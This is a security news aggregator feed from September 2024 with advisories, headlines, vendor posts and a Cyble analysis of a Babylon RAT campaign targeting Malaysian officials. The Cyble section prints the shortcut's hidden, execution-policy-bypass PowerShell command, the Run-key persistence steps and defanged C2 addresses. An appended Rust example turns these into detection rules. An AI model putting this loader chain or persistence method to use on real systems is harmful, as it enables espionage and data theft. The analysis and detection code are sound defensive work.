ZDI-24-1195: Malwarebytes Antimalware Link Following Local Privilege Escalation VulnerabilityThis vulnerability allows local attackers to escalate privileges on affected installations of Malwarebytes Antimalware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.0. The following CVEs are assigned: CVE-2024-6260.
by Zero Day Initiative Advisories
2024-09-05 00:00:00
ZDI-24-1194: Linux Kernel Plan 9 File System Race Condition Local Privilege Escalation VulnerabilityThis vulnerability allows local attackers to escalate privileges on affected installations of Linux Kernel. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39463.
by Zero Day Initiative Advisories
2024-09-05 00:00:00
ZDI-24-1193: Delta Electronics DIAScreen DPA File Parsing Stack-based Buffer Overflow Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics DIAScreen. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-7502.
by Zero Day Initiative Advisories
2024-09-04 23:29:15
New Supply Chain Attack “Revival Hijack” Risks Massive PyPI TakeoversJFrog's cybersecurity researchers have identified a new PyPI attack technique called "Revival Hijack," which exploits package deletion policies. Over 22,000 packages are at risk, potentially impacting thousands of users. Stay informed!
by Hackread
2024-09-04 21:44:48
Simplify cybersecurity with a platform consolidation frameworkTo deal with today’s complex and constantly evolving threat landscape and an expanding attack surface, organizations have added a wide range of cybersecurity solutions as they try to improve their security posture and protect their networks, applications, and data.
by Barracuda
2024-09-04 21:34:14
White House Unveils Road Map to Fix BGPThe White House Office of the National Cyber Director released a plan outlining steps network operators and service providers need to take to secure BGP from abuse and configuration errors.
by Dark Reading
2024-09-04 21:22:00
North Korean Hackers Target Job Seekers with Fake FreeConference AppNorth Korean threat actors have leveraged a fake Windows video conferencing application impersonating FreeConference.com to backdoor developer systems as part of an ongoing financially-driven campaign dubbed Contagious Interview. The new attack wave, spotted by Singaporean company Group-IB in mid-August 2024, is yet another indication that the activity is also leveraging native installers for
by The Hacker News
2024-09-04 20:18:54
'Revival Hijack' on PyPI Disguises Malware With Legitimate File NamesAdversaries reusing abandoned package names sneak malware into organizations in a sort of software shell game.
by Dark Reading
2024-09-04 19:58:34
Cisco Warns of Severe Vulnerabilities in Licensing ToolCisco has issued a critical security advisory for its Smart Licensing Utility, highlighting two severe vulnerabilities that could allow remote attackers to gain control of systems or access sensitive data without authentication. The vulnerabilities, identified as CVE-2024-20439 and CVE-2024-20440, received a critical CVSS score of 9.8. Both flaws stem from improper credential handling and excessive …
by Cyber Insider
2024-09-04 19:38:27
Yubico Discloses Unfixable Cryptographic Flaw on Some YubiKeysYubico has disclosed a security vulnerability affecting certain YubiKey and YubiHSM devices, which rely on Infineon's cryptographic library. This flaw allows sophisticated attackers with physical access to potentially recover private keys used in cryptographic operations. While the vulnerability is significant, it affects only older firmware versions, and Yubico has since removed the flawed library from …
by Cyber Insider
2024-09-04 19:35:56
X is hiring staff for security and safety after two years of layoffsThe hiring effort comes after X, formerly known as Twitter, laid off 80% of its trust and safety staff since Musk's takeover.
by TechCrunch
2024-09-04 19:06:00
Android Users Urged to Install Latest Security Updates to Fix Actively Exploited FlawGoogle has released its monthly security updates for the Android operating system to address a known security flaw that it said has come under active exploitation in the wild. The high-severity vulnerability, tracked as CVE-2024-32896 (CVSS score: 7.8), relates to a case of privilege escalation in the Android Framework component. According to the description of the bug in the NIST National
by The Hacker News
2024-09-04 18:43:25
LLM Security: Going Beyond FirewallsAs enterprises increasingly adopt large language models, security concerns are shifting from traditional LLM Firewalls to more advanced LLM Threat Detection and Response.
by ITPro Today
2024-09-04 18:38:16
Quantifying the Value of Bug Bounty Programs: ROI, ROM, or Both? (HackerOne, Wed, 09/04/2024 - 11:38)

HackerOne customers consistently factor in cost savings when measuring the success of their security engagements, with 59% valuing the estimated savings of reputational or customer-related incidents and 54% valuing the financial savings estimated from avoiding risk. However, quantifying the ROI for security control testing can be challenging due to the intangible nature of cybersecurity benefits. How do you measure the value of preventing something from happening?

Supplementing ROI With ROM

Traditional ROI calculations often fall short in capturing the full value of security investments. Gaining traction as an alternative, and in most cases complementary, assessment mechanism is Return on Mitigation (ROM), which compares the anticipated costs of a security breach with the costs of implementing mitigation strategies. It provides a more nuanced understanding of the qualitative and quantitative benefits of proactive security measures. ROM factors in various potential costs, including:
- Restoring compromised systems
- Lost revenue due to downtime
- Legal and regulatory penalties
- Damage to public trust and reputation

By assessing the effectiveness of mitigation or prevention strategies in terms of potential financial consequences, ROM offers a practical framework for stakeholders to evaluate the tangible and intangible value of security investments. It also shifts the focus from immediate cost savings to long-term resilience, with a magnifying glass on risk management.

“The bug bounty program is the highest ROI across all of our spend. It’s really hard to show ROI, but with bug bounty, I have a baseline. I can say, ‘This vulnerability was able to be found by someone outside the organization. Someone that was not authorized to access this system was able to access it.’ Even with vulnerabilities that are not within our program, bug bounty allows me to put a price tag on them. I can explain this business case and our stakeholders are able to prioritize bug bounty higher than other tools that also generate ROI.” — Eric Kieling, Head of Application Security, Booking.com

ROI and ROM Calculations

To illustrate the practical benefits of human-powered security testing and calculations of ROI and ROM, consider a case study from the financial services sector. A major financial institution implemented a bug bounty program alongside its existing red teaming efforts. Over the course of a year, the program identified several critical vulnerabilities that had been overlooked by previous tests.

Scenario
- Initial security investment: The institution invested $200,000 in the bug bounty program and an additional $100,000 in red teaming exercises.
- Potential breach costs: A potential breach was estimated to cost the institution $5 million, including costs associated with restoring compromised systems, lost revenue, legal penalties, and reputational damage.

Return on Investment (ROI)
A simple ROI calculation sets the $300,000 spent against the potential $5 million breach.
- Breach prevention: By identifying and mitigating vulnerabilities, the institution avoided a potential $5 million breach.
- Cost of testing: The total investment in proactive security testing was $300,000.

Using traditional ROI calculations: a conventional ROI or cost-benefit analysis, (benefit - cost) / cost = ($5,000,000 - $300,000) / $300,000, yields approximately 15.67, i.e. roughly $15.67 returned for every dollar spent.

Return on Mitigation (ROM)
If we look at ROM, we compare the cost of implementing security measures against the anticipated breach cost: $5,000,000 / $300,000 ≈ 16.67. In this scenario, the ROM indicates that for every dollar spent on mitigation, the organization potentially saves $16.67 in breach costs. For the sake of this case example, we kept these costs simple. However, it is important to remember that breach costs these days include much more than just a simple flat dollar amount. They also include potential ransom payments, compliance requirements, regulatory fines, legal fees, brand damage, and much more. Breaches in the financial services sector, for example, cost an average of $6.08 million.

Real-World ROM

According to the 7th Annual Hacker-Powered Security Report, the median price of a bug on the HackerOne platform is $500, up from $400 in 2022. The average bounty in the 90th percentile is up from $2,500 to $3,000. But here's the dramatic reality: the cost of these vulnerabilities going unnoticed and being exploited in the wild is an overwhelming 1,600 times more than the cost of the bounty — $4.88M on average.

“Since 2019, Zoom has worked with 900 hackers, of which 300 have submitted vulnerabilities that we have had to quickly move on. We’ve paid out over $7 million. It’s a substantial investment but the returns are worth it: we find world-class talent to find real-world solutions before it’s a real-world problem.” — Michael Adams, CISO, Zoom

Deliver Strategic Value From Security Initiatives With HackerOne

At HackerOne, we’re not only the leader in high-quality, repeatable security engagements — we’re also the experts in helping partners quantify and qualify the value of those engagements for more robust security budgets and successful programs. To learn more about ROI and ROM and the best ways to express the value of proactive security to stakeholders with human-powered security, download the SANS White Paper: Human-Powered Security Testing.
by HackerOne
2024-09-04 18:30:00
Researchers Find Over 22,000 Removed PyPI Packages at Risk of Revival HijackA new supply chain attack technique targeting the Python Package Index (PyPI) registry has been exploited in the wild in an attempt to infiltrate downstream organizations. It has been codenamed Revival Hijack by software supply chain security firm JFrog, which said the attack method could be used to hijack 22,000 existing PyPI packages and result in "hundreds of thousands" of malicious package
by The Hacker News
2024-09-04 17:32:07
Code Intelligence Appoints Dr. Eric Brüggemann as CEOFormer BCG and Thinkproject Executive to Lead Code Intelligence Through Continued International Expansion. Bonn, Germany — September 05, 2024 — Code Intelligence, the pioneer in AI-automated software testing, today announced the appointment of Dr. Eric Brüggemann as Chief Executive Officer (CEO), as the company continues to scale to meet growing international demand. Former CEO and Co-Founder Sergej Dechand will remain with the organization as Chief Evangelist. Dr. Brüggemann joined Code Intelligence as Managing Director and Chief Operating Officer (COO) last year, where he led enterprise customer engagements for the company. During his tenure, he laid the foundation for repeatable success and sustainable growth. Prior to Code Intelligence, he served as Chief of Staff at Thinkproject, leading the transformation from a heterogeneous product portfolio into a unified platform as well as expanding and further harmonizing the international footprint across more than 15 countries worldwide.
by Code Intelligence
2024-09-04 17:23:35
DDoS Attacks Hit France Over Telegram’s Pavel Durov ArrestHacktivists unite for the #FreeDurov campaign to launch a massive cyber campaign against France in response to Telegram…
by Hackread
2024-09-04 17:18:00
That massive Pixel security flaw reported last month has been patchedGoogle's new update removes software intended only for cell phone store employees that could have been exploited by bad actors.
by ZDNET Security
2024-09-04 17:00:54
Open Source Tool Allows Voters to Verify Election ResultsThe ElectionGuard project allows anyone — voters, campaign staffers, and election officials — to cryptographically verify ballots, a promise which may bolster faith in election integrity.
by Dark Reading
2024-09-04 16:58:59
Quantum-resistant encryption and compatibility issues | Kaspersky official blogApplications and libraries supporting post-quantum cryptography in 2024
by Kaspersky
2024-09-04 16:57:40
FBI: North Korean Actors Readying Aggressive Cyberattack WaveSophisticated social engineering is expected to accompany threat campaigns that are highly targeted and aimed at stealing crypto and deploying malware.
by Dark Reading
2024-09-04 16:57:00
Zyxel Patches Critical OS Command Injection Flaw in Access Points and RoutersZyxel has released software updates to address a critical security flaw impacting certain access point (AP) and security router versions that could result in the execution of unauthorized commands. Tracked as CVE-2024-7261 (CVSS score: 9.8), the vulnerability has been described as a case of operating system (OS) command injection. "The improper neutralization of special elements in the
by The Hacker News
2024-09-04 16:57:00
The New Effective Way to Prevent Account TakeoversAccount takeover attacks have emerged as one of the most persistent and damaging threats to cloud-based SaaS environments. Yet despite significant investments in traditional security measures, many organizations continue to struggle with preventing these attacks. A new report, "Why Account Takeover Attacks Still Succeed, and Why the Browser is Your Secret Weapon in Stopping Them" argues that the
by The Hacker News
2024-09-04 16:52:24
“Hello pervert” sextortion scam includes new threat of Pegasus—and a picture of your home"Hello pervert" sextortion mails keep adding new features to their email to increase credibility and urge victims to pay
by Malwarebytes Labs
2024-09-04 16:52:00
PyPI loophole puts thousands of packages at risk of compromise
by ComputerWeekly
2024-09-04 16:20:52
AI Innovation in the Spotlight at Fal.Con 2024Every year, the role of AI in cybersecurity grows more prominent. This is especially true in the security operations center (SOC), where AI-native detection and GenAI-fueled workflows are advancing cyber defense and shaping the end-to-end analyst experience. But while defenders are using AI to operate with greater speed and scale, adversaries are following suit, using […]
by CrowdStrike
2024-09-04 15:18:43
You have one minute to save your leaked AWS credentialsNew research suggests that cyber-thieves can discover and use leaked credentials in a matter of seconds.
by ThreatDown
2024-09-04 15:13:19
How to avoid election related scamsWith the elections at full throttle we are seeing several types of scams resurfacing and undoubtedly more will come
by Malwarebytes Labs
2024-09-04 15:10:59
Threat Actors Increasingly Exploit Deepfakes for Social EngineeringThe availability of deepfake technology has given threat actors a valuable tool for social engineering attacks, according to researchers at BlackBerry.
by KnowBe4
2024-09-04 14:58:25
[Security Masterminds Podcast] The Human Side of Cybersecurity: Bridging the Gap with Empathy and StrategyIn cybersecurity, technology often takes center stage. From the latest AI-driven defenses to sophisticated encryption techniques, it's easy to overlook the most crucial element: the human factor.
by KnowBe4
2024-09-04 14:48:34
Rage Stealer Rebranded as Angry Stealer, Now Uses Telegram Bot for Data TheftBeware of “Angry Stealer,” a new malware targeting your online accounts. This rebranded version of Rage Stealer steals…
by Hackread
2024-09-04 14:47:35
OSCP is not the same anymore

A few days ago, OffSec announced a change to the OSCP certification, which will now be called OSCP+. OffSec will replace the current OSCP exam with an updated version that includes the following changes:
1. Changes in the Active Directory portion
2. Removal of bonus points

1. Changes in the Active Directory portion

To meet the changing cybersecurity landscape and prepare candidates for real-world challenges, OffSec has updated the Active Directory portion of the exam. This change is based on an "assumed compromise" model, where you will be provided authorized access to a domain or a user. With this initial access to the AD domain, your goal will be full domain compromise.

2. Removal of bonus points

What the bonus points were: bonus points were a way to drive engagement and adoption, but most learners did not require bonus points to pass the OSCP exam. Rather, the exercises required to earn bonus points better enabled learners to train and prepare for a successful OSCP exam experience.

Before this change, OffSec allowed candidates to earn up to 10 bonus points toward their exam. This meant that if you secured 10 bonus points before attempting the exam, you only needed 60 points in the exam itself to pass. With the removal of bonus points, candidates will no longer receive this benefit and must secure all 70 points during the exam. This change aims to provide more consistency and fairness across all OffSec exams and certifications.

Candidates who pass the new exam will earn both the OSCP and OSCP+ certifications. However, the OSCP+ certificate will expire 3 years after issuance, while the OSCP certificate does not expire and is valid for a lifetime. Candidates can renew their OSCP+ certification in the following ways:
- Pass a recertification exam within 6 months of the OSCP+ expiry
- Pass any other OffSec certification exam: OSEP, OSWA, OSED, or OSEE
- Participate in a CPE program (details to be announced in late 2024)

For existing OSCP holders: OffSec is offering existing OSCP holders the chance to take the new OSCP+ exam at a discounted price of $199 USD if purchased between 1 Nov 2024 and 31 Mar 2025. If you are an existing OSCP holder, taking the OSCP+ exam is not mandatory. The changes in the exam will not affect your existing OSCP certification, which remains valid for a lifetime. However, if you want to upgrade to the OSCP+ certification, you will need to take the recertification exam.

Reference: Link to the OffSec Support Portal

OSCP is not the same anymore was originally published in InfoSec Write-ups on Medium.
by InfoSec Write-ups
2024-09-04 14:13:00
Clearview AI Faces €30.5M Fine for Building Illegal Facial Recognition Database
The Dutch Data Protection Authority (Dutch DPA) has imposed a fine of €30.5 million ($33.7 million) against facial recognition firm Clearview AI for violating the General Data Protection Regulation (GDPR) in the European Union (E.U.) by building an "illegal database with billions of photos of faces," including those of Dutch citizens. "Facial recognition is a highly intrusive technology that you
by The Hacker News
2024-09-04 14:00:54
Criminal IP Secures PCI DSS v4.0 Certification, Enhancing Payment Security with Top-Level Compliance
Torrance, United States / California, 4th September 2024, CyberNewsWire
by Hackread
2024-09-04 14:00:00
How CISOs Can Effectively Communicate Cyber-Risk
A proximity resilience graph offers a more accurate representation of risk than heat maps and risk registers, and allows CISOs to tell a complex story in a single visualization.
by Dark Reading
2024-09-04 13:59:19
The Intricate Babylon RAT Campaign Targets Malaysian Politicians, Government

Key takeaways
- Cyble Research and Intelligence Lab (CRIL) has identified a highly targeted cyber-attack aimed at political figures and government officials in Malaysia. The attack showcases the advanced tactics employed by the Threat Actor (TA) in targeting high-profile individuals and institutions.
- The campaign, active since July, has employed at least three distinct malicious ISO files specifically designed to compromise Malaysian entities.
- The malicious ISO files contain multiple components, including a shortcut (LNK) file, a hidden PowerShell script, a malicious executable, and a decoy PDF file.
- The campaign delivers Babylon RAT as its final payload. Babylon RAT, an open-source Remote Access Trojan (RAT), provides unauthorized access to the victim's machine. It allows the TA to execute commands remotely, control the system, and exfiltrate sensitive data.
- Intelligence from Cyble Vision's platform indicates that the TA behind this campaign has previously targeted Malaysian entities using Quasar RAT, another open-source RAT.

Overview
Cyble Research and Intelligence Lab (CRIL) has recently discovered a campaign involving malicious ISO files targeting political figures and government officials within Malaysia. The initial infection vector for this campaign is unclear. The ISO file is crafted with deceptive elements to trick users into thinking they are interacting with legitimate files. It contains a visible shortcut file that mimics a PDF document, alongside a hidden malicious executable, a lure PDF document, and a concealed PowerShell script. Upon opening the shortcut file, the PowerShell script executes silently in the background, launches the decoy PDF and copies the malicious executable to the %appdata% directory. The script also creates a registry entry to ensure the executable runs on system startup and then executes the malicious file.
The final payload in this campaign is Babylon RAT, an open-source Remote Access Trojan (RAT) designed for comprehensive surveillance and data theft. Babylon RAT offers a wide range of malicious functionalities, including capturing keystrokes, clipboard monitoring, password extraction, and remote command execution. It enables TAs to covertly monitor user activity and steal sensitive information. The RAT maintains persistence on infected systems through registry modifications, ensuring it can survive reboots and continue operations. Additionally, Babylon RAT includes a sophisticated control panel, allowing TAs to efficiently manage compromised systems, execute commands remotely, and access stolen data, making it a powerful tool for cyber espionage and data exfiltration. The figure below shows the infection chain.
Figure 1 - Infection chain

Technical Analysis
This campaign has been active since last July, with three distinct malicious ISO files observed targeting Malaysian entities. The use of three different lure documents suggests an attempt to reach a broader audience. At the end of July, we observed two ISO files: one containing a lure document addressing political concerns in Malaysia, suggesting the campaign targets politically engaged individuals in the country; the other included a lure related to Majlis Amanah Rakyat (MARA), indicating that the TA is targeting Malaysian government officials. The figures below show the lure documents observed in July.
Figure 2 - Lure document
Figure 3 - Lure document
At the end of August, we identified another malicious ISO file with a lure document related to the MyKHAS system, indicating that the TA is targeting Malaysian government officials who use the MyKHAS platform, as shown below.
Figure 4 - Lure document
In all three ISO files a similar approach is used: each contains a visible shortcut file that resembles a PDF document, as well as a hidden malicious executable, a lure PDF document, and a concealed PowerShell script, as shown in the figure below.
Figure 5 - Inside the ISO file once mounted
For analysis, we are examining the ISO sample identified in August, named “PANDUAN_PENGGUNA_MyKHAS.iso”, with the SHA-256 value d9f0268cbaa1ae45dfa755adab9dda2d8bdff3c8bf8a00d23bbc6894c28e225f. When the user opens the .lnk file, it silently executes the hidden PowerShell script in the background. This execution is triggered by a command line embedded in the shortcut file:
    %windir%/System32/cmd.exe /c powershell -WindowStyle hidden -nologo -executionpolicy bypass -File "PANDUAN_PENGGUNA_MyKHAS.ps1"
Following this, the PowerShell script (.ps1) opens the decoy PDF file using the Invoke-Item cmdlet. It then copies the malicious executable, controller.exe, into the Windows %appdata% directory via Copy-Item. To ensure the executable runs automatically at system startup, the script adds a startup entry in the registry under HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run with the name “USBController”. Lastly, the script launches controller.exe from the current directory using Invoke-Expression. The figure below shows the content of the malicious PowerShell script.
Figure 6 - PowerShell script
The executable controller.exe has been identified as a wrapper for Babylon RAT, an open-source remote access tool (RAT) commonly used by TAs for cyber espionage and data exfiltration.

Payload analysis
During our analysis, we discovered that the file controller.exe contains a significant data overlay, approximately 300 MB in size, which appears to be intentionally designed to evade detection by security products. The file employs dynamic API resolution using GetModuleHandle and GetProcAddress. This technique allows the wrapper to dynamically call Win32 cryptographic APIs to decrypt its embedded encrypted content. Specifically, it uses the base data value shown below to derive a 256-bit key via the CryptDeriveKey function, which is subsequently used with the AES-256 algorithm in the CryptDecrypt API to decrypt the payload.
Figure 7 - Base data value passed to CryptDeriveKey to create the AES-256 key
Figure 8 - Decrypted payload
The decrypted payload is itself packed with UPX; execution is then transferred to the decrypted payload using the CreateThread Windows API, as shown in the figure below.
Figure 9 - Thread creation

Babylon RAT
The decrypted payload is Babylon RAT, an open-source remote access tool (RAT) widely used by cybercriminals for espionage and data theft. It allows TAs to take full control of a victim's machine remotely, enabling actions like file manipulation, process management, and command execution. The RAT includes keylogging features, capturing user keystrokes to steal sensitive information like passwords. It also supports clipboard monitoring and can take screenshots of the victim's desktop. Persistence mechanisms allow it to survive reboots by modifying system settings or registry keys. Babylon RAT communicates with a command-and-control (C2) server for further instructions, data exfiltration, and payload delivery. It is often used for long-term surveillance and data harvesting in targeted cyberattacks. The figure below shows the Babylon RAT string present in the process memory.
Figure 10 - Babylon RAT

C&C Communication
The Babylon RAT samples observed in this campaign connect to command-and-control (C&C) servers at 149.28.19[.]207 and 64.176.65[.]152 over port 443, enabling TAs to gain control of the infected machine and exfiltrate sensitive data. While the identity of the TA behind this campaign remains unknown, intelligence from the Cyble Vision platform indicates that these Malaysian entities were also targeted using Quasar RAT in the past.
Figure 11 - IP address 64.176.65[.]152 details in Cyble Vision

Conclusion
The sophisticated cyber-attack targeting political figures and government officials in Malaysia showcases the heightened interest and advanced techniques of the TAs. The ongoing campaign, involving malicious ISO files, highlights the severity of the threat and the persistent nature of such attacks. The use of Babylon RAT, an open-source Remote Access Trojan, illustrates the capability of these TAs to gain unauthorized control and exfiltrate sensitive data. Additionally, the recurrence of targeting Malaysian entities with similar tools, such as Quasar RAT, emphasizes the need for enhanced security measures and vigilance to defend against these evolving cyber threats.

Recommendations
- Implement advanced email filtering solutions to detect and block malicious attachments, such as ISO files, and prevent them from reaching end users.
- Deploy and regularly update endpoint security solutions, including antivirus and anti-malware software, to detect and mitigate threats like Babylon RAT.
- Implement continuous network monitoring and anomaly detection to identify and respond to unusual activities or unauthorized connections, especially those involving command-and-control servers.
- Conduct comprehensive security awareness training for political figures and government officials to recognize and avoid phishing attempts and malicious files.
- Ensure that all systems and software are kept up to date with the latest security patches to reduce vulnerabilities that could be exploited by threat actors.

MITRE ATT&CK® Techniques
Tactic | Technique | Procedure
Execution (TA0002) | User Execution: Malicious File (T1204.002) | The ISO file contains an LNK file disguised as a PDF. When executed, it runs a PowerShell script to initiate the attack.
Execution (TA0002) | Command and Scripting Interpreter: PowerShell (T1059.001) | The LNK file triggers a PowerShell script to execute the payload and create persistence.
Persistence (TA0003) | Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder (T1547.001) | The PowerShell script creates a startup entry in the registry.
Defense Evasion (TA0005) | Dynamic API Resolution (T1027.007) | Cryptographic APIs are resolved at runtime to evade IAT-based detection.
Defense Evasion (TA0005) | LNK Icon Smuggling (T1027.012) | The LNK file is disguised with a PDF icon.
Defense Evasion (TA0005) | Encrypted/Encoded File (T1027.013) | The Babylon RAT payload is encrypted with AES-256 to evade detection by security tools.
Credential Access (TA0006) | Credentials from Password Stores: Credentials from Web Browsers (T1555.003) | Babylon RAT can extract passwords from web browsers.
Discovery (TA0007) | System Information Discovery (T1082) | Babylon RAT collects system information from the victim's machine.
Collection (TA0009) | Clipboard Data (T1115) | Babylon RAT monitors and logs clipboard data, storing it for later exfiltration.
Collection (TA0009) | Input Capture: Keylogging (T1056.001) | The RAT captures keystrokes using the SetWindowsHookEx Win32 API.
Command and Control (TA0011) | Application Layer Protocol: Web Protocols (T1071.001) | Babylon RAT communicates with the TA's C2 server over web protocols.
Exfiltration (TA0010) | Exfiltration Over C2 Channel (T1041) | The TA exfiltrates collected data through the established C2 channel.

Indicators of Compromise
The SHA-256 hashes of the ISO, LNK, PS1 and executable files, together with the C&C IP addresses and domains, are listed in the original Cyble post.
The post The Intricate Babylon RAT Campaign Targets Malaysian Politicians, Government appeared first on Cyble.
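As an added example that is not part of the Cyble report, the following Rust code turns the two host-observable steps of the chain described above into checks over constructed Sysmon-style events: cmd.exe spawning a hidden, ExecutionPolicy-bypass PowerShell script, and a Run-key value pointing at an executable under %appdata%. The event shape, field names and sample events are assumptions made for this example, not telemetry from the campaign.

```rust
// Added example, not part of the Cyble report: rule-based checks over a
// constructed, Sysmon-like event shape. Field names and sample events are
// assumptions for this example, not real telemetry from the campaign.

#[derive(Debug, PartialEq, Eq)]
pub enum Finding {
    /// cmd.exe launched a hidden, ExecutionPolicy-bypass PowerShell script
    /// (the behaviour the LNK's embedded command line produces).
    HiddenPowerShellScript { command_line: String },
    /// A Run-key value was set pointing at an executable under %appdata%.
    AppDataRunKey { value_name: String, target: String },
}

/// Minimal event: event_id 1 = ProcessCreate, 13 = RegistryEvent (value set).
/// Fields that do not apply to an event type are left empty.
pub struct Event<'a> {
    pub event_id: u32,
    pub parent_image: &'a str,
    pub command_line: &'a str,
    pub target_object: &'a str,
    pub details: &'a str,
}

fn check_process(ev: &Event) -> Option<Finding> {
    if ev.event_id != 1 {
        return None;
    }
    let cl = ev.command_line.to_ascii_lowercase();
    let from_cmd = ev.parent_image.to_ascii_lowercase().ends_with("\\cmd.exe");
    let hidden = cl.contains("-windowstyle hidden");
    let bypass = cl.contains("-executionpolicy bypass");
    let script = cl.contains("-file ");
    if cl.contains("powershell") && from_cmd && hidden && bypass && script {
        return Some(Finding::HiddenPowerShellScript {
            command_line: ev.command_line.to_string(),
        });
    }
    None
}

fn check_registry(ev: &Event) -> Option<Finding> {
    if ev.event_id != 13 {
        return None;
    }
    let key = ev.target_object.to_ascii_lowercase();
    let data = ev.details.to_ascii_lowercase();
    let run_key = key.contains("\\software\\microsoft\\windows\\currentversion\\run\\");
    let in_appdata = data.contains("\\appdata\\roaming\\") || data.contains("%appdata%");
    if run_key && in_appdata && data.contains(".exe") {
        // The value name is the last component of the registry path.
        let value_name = ev.target_object.rsplit('\\').next().unwrap_or("").to_string();
        return Some(Finding::AppDataRunKey {
            value_name,
            target: ev.details.to_string(),
        });
    }
    None
}

/// Runs both checks over a batch of events and returns every hit.
pub fn scan(events: &[Event]) -> Vec<Finding> {
    events
        .iter()
        .filter_map(|ev| check_process(ev).or_else(|| check_registry(ev)))
        .collect()
}

/// Constructed sample batch: a benign scheduled script, the LNK-triggered
/// command line quoted in the report, a benign Run value, and the
/// USBController Run value pointing at the dropped controller.exe.
pub fn sample_events() -> Vec<Event<'static>> {
    vec![
        Event { event_id: 1, parent_image: "C:\\Windows\\explorer.exe",
                command_line: "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1",
                target_object: "", details: "" },
        Event { event_id: 1, parent_image: "C:\\Windows\\System32\\cmd.exe",
                command_line: "powershell -WindowStyle hidden -nologo -executionpolicy bypass -File \"PANDUAN_PENGGUNA_MyKHAS.ps1\"",
                target_object: "", details: "" },
        Event { event_id: 13, parent_image: "", command_line: "",
                target_object: "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive",
                details: "C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe /background" },
        Event { event_id: 13, parent_image: "", command_line: "",
                target_object: "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\USBController",
                details: "C:\\Users\\user\\AppData\\Roaming\\controller.exe" },
    ]
}
```

Either finding alone is worth triage; both from the same host within minutes matches the report's chain and should be escalated.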
by CYBLE
2024-09-04 13:09:00
Worried about the YubiKey 5 vulnerability? Here's why I'm not
I'm a big fan of YubiKeys and the fact that some of them are vulnerable to being cloned doesn't change that. Let me explain.
by ZDNET Security
2024-09-04 13:00:00
CEO's Arrest Will Likely Not Dampen Cybercriminal Interest in Telegram
In recent years, the platform has become a go-to tool for executing almost all conceivable cybercriminal activity.
by Dark Reading
2024-09-04 13:00:00
CyberheistNews Vol 14 #36 KnowBe4 Expands Children's Interactive Cybersecurity Activity Kit for 2024/2025 School Year
by KnowBe4
2024-09-04 12:02:00
Deploying Rust in Existing Firmware Codebases
Posted by Ivan Lozano and Dominik Maier, Android Team

Android's use of safe-by-design principles drives our adoption of memory-safe languages like Rust, making exploitation of the OS increasingly difficult with every release. To provide a secure foundation, we're extending hardening and the use of memory-safe languages to low-level firmware (including in Trusty apps).
In this blog post, we'll show you how to gradually introduce Rust into your existing firmware, prioritizing new code and the most security-critical code. You'll see how easy it is to boost security with drop-in Rust replacements, and we'll even demonstrate how the Rust toolchain can handle specialized bare-metal targets.
Drop-in Rust replacements for C code are not a novel idea and have been used in other cases, such as librsvg's adoption of Rust, which involved replacing C functions with Rust functions in-place. We seek to demonstrate that this approach is viable for firmware, providing a path to memory safety in an efficient and effective manner.

Memory Safety for Firmware
Firmware serves as the interface between hardware and higher-level software. Due to the lack of software security mechanisms that are standard in higher-level software, vulnerabilities in firmware code can be dangerously exploited by malicious actors. Modern phones contain many coprocessors responsible for handling various operations, and each of these runs its own firmware. Often, firmware consists of large legacy code bases written in memory-unsafe languages such as C or C++. Memory unsafety is the leading cause of vulnerabilities in Android, Chrome, and many other code bases.
Rust provides a memory-safe alternative to C and C++ with comparable performance and code size. Additionally, it supports interoperability with C with no overhead. The Android team has discussed Rust for bare-metal firmware previously, and has developed training specifically for this domain.

Incremental Rust Adoption
Our incremental approach, focusing on replacing new and highest-risk existing code (for example, code which processes external untrusted input), can provide maximum security benefits with the least amount of effort. Simply writing any new code in Rust reduces the number of new vulnerabilities and over time can lead to a reduction in the number of outstanding vulnerabilities.
You can replace existing C functionality by writing a thin Rust shim that translates between an existing Rust API and the C API the codebase expects. The C API is replicated and exported by the shim for the existing codebase to link against. The shim serves as a wrapper around the Rust library API, bridging the existing C API and the Rust API. This is a common approach when rewriting or replacing existing libraries with a Rust alternative.

Challenges and Considerations
There are several challenges you need to consider before introducing Rust to your firmware codebase. In the following sections we address the general state of no_std Rust (that is, bare-metal Rust code), how to find the right off-the-shelf crate (a Rust library), porting an std crate to no_std, using Bindgen to produce FFI bindings, how to approach allocators and panics, and how to set up your toolchain.

The Rust Standard Library and Bare-Metal Environments
Rust's standard library consists of three crates: core, alloc, and std. The core crate is always available. The alloc crate requires an allocator for its functionality. The std crate assumes a full-blown operating system and is commonly not supported in bare-metal environments. A third-party crate indicates it doesn't rely on std through the crate-level #![no_std] attribute. Such a crate is said to be no_std compatible. The rest of the blog will focus on these.

Choosing a Component to Replace
When choosing a component to replace, focus on self-contained components with robust testing. Ideally, the component's functionality can be provided by a readily available open-source implementation which supports bare-metal environments.
Parsers which handle standard and commonly used data formats or protocols (such as XML or DNS) are good initial candidates. This ensures the initial effort focuses on the challenges of integrating Rust with the existing code base and build system rather than the particulars of a complex component, and it simplifies testing. This approach eases introducing more Rust later on.

Choosing a Pre-Existing Crate (Rust Library)
Picking the right open-source crate (Rust library) to replace the chosen component is crucial. Things to consider are:
- Is the crate well maintained? For example, are open issues being addressed and does it use recent crate versions?
- How widely used is the crate? This may be used as a quality signal, but is also important to consider in the context of using crates later on which may depend on it.
- Does the crate have acceptable documentation?
- Does it have acceptable test coverage?
Additionally, the crate should ideally be no_std compatible, meaning the standard library is either unused or can be disabled. While a wide range of no_std compatible crates exist, others do not yet support this mode of operation; in those cases, see the next section on converting a std library to no_std.
By convention, crates which optionally support no_std will provide an std feature to indicate whether the standard library should be used. Similarly, the alloc feature usually indicates that using an allocator is optional.
